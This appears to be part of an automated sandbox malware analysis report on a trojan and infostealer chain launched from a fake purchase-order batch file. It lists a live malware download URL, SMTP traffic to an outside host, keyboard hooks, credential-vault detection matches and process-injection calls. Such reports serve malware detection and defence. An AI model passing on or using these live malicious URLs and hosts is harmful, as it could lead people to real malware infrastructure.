                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 00987394h14_2_00987108
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 009878DCh14_2_0098767A
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_00987E60
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_00987E5F
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_00987FBC
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 4x nop then jmp 065EBCBDh20_2_065EBA40

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5E4B8 InternetCheckConnectionA,4_2_02E5E4B8
                      Source: global trafficTCP traffic: 192.168.2.10:49749 -> 51.195.88.199:587
                      Source: Joe Sandbox ViewIP Address: 198.252.105.91 198.252.105.91
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49713 -> 198.252.105.91:443
                      Source: global trafficTCP traffic: 192.168.2.10:49749 -> 51.195.88.199:587
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: gxe0.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: powershell.exe, 00000010.00000002.1551553255.0000000003098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                      Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                      Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                      Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: x.exe, x.exe, 00000004.00000002.1532108594.000000002215C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1551725897.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1474717040.0000000002969000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.000000000296A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1533707068.00000000224BF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D24000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1532108594.00000000220FC000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000C.00000000.1460918263.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001A.00000002.1609735089.0000000002FA2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001C.00000000.1577974384.0000000000416000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.pmail.com
                      Source: neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: x.exe, 00000004.00000002.1464571050.0000000000696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/
                      Source: x.exe, 00000004.00000002.1522045362.0000000020DAD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysx
                      Source: x.exe, 00000004.00000002.1522045362.0000000020DC3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D98000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_WisrysxlfsseV
                      Source: x.exe, 00000004.00000002.1464571050.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
                      Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49797 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: server_BTC.exe.12.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: TrojanAIbot.exe.14.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batStatic file information: 1393123
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E58670 NtUnmapViewOfSection,4_2_02E58670
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E58400 NtReadVirtualMemory,4_2_02E58400
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E57A2C NtAllocateVirtualMemory,4_2_02E57A2C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,4_2_02E5DC8C
